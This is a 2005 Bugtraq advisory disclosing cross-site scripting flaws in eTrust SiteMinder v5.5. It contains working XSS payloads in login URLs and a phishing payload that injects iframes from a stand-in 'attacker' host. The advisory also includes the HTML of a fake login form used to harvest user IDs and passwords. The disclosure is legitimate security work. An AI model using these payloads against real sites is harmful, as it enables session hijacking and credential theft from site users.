[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: SiteMinder Multiple Vulnerabilities
From: c0ntexb () gmail ! com
Date: 2005-07-08 14:03:11
Message-ID: 20050708140311.20979.qmail () securityfocus ! com
[Download RAW message or body]
/*
*****************************************************************************************************************
$ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 08 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
Siteminder
http://www3.ca.com/Solutions/Product.asp?ID=5262
"eTrust™ SiteMinder® is a market-leading, security and management foundation for \
enterprise Web applications with a centralized security infrastructure for managing \
user authentication and access. eTrust SiteMinder delivers the market’s most \
advanced security management capabilities and enterprise-class site administration, \
reducing overall IT operational cost and complexity. eTrust SiteMinder enables the \
secure delivery of essential information and applications to employees, partners, \
suppliers and customers, and scales with growing business needs.."
Siteminder is vulnerable to XSS whereby a user can tag HTML or javascript on to \
various locations in a URL or input field and have the script run in the local users \
browser. This can be used to perform phishing attacks, hijack users browser sessions \
or user account information by redrawing the login page of a site.
http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&
PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>
The following link will abuse the URL option by first logging the user out of the \
site with a timeout error, due to the fact that we send her off to another HTTPS \
site, taking the user back to the login page. Next, we open an IFRAME over the \
original login fields with malicious Username and Password input fields, whereby a \
user will then supply their login details to a malicious site, to be later harvested \
and used in an attack.
http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-
0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html">
<iframe bgcolor="white" src="https://attacker/snoop.html" style="position: \
absolute; top: 270px; left: 15 px;"></iframe><iframe \
src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 \
px;"></iframe>
To test if you are vulnerable to this issue, you can tag the following on to the \
end of a siteminder URL. If it is successful, you should see the Google homepage \
within an IFRAME.
"><iframe bgcolor="white" src="http://www.google.com" style="position: absolute; \
top: 270px; left: 15 px;"></iframe><iframe src="http://www.google.com" \
style="position: absolute; top: 270px; left: 15 px;"></iframe>
/* snoop.html */
<html>
</head></head>
<body>
<form>
User ID
<input type="text" name="UserID">
<br>
Password:
<input type="text" name="Password">
<input type="submit" value="Submit">
</form>
</body>
</html>
I have contacted Netegrity via ca.com multiple times but received no response, as \
such, users should use a filtering technology like modsecurity to detect the above \
descibed attacks until a fix has been released.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic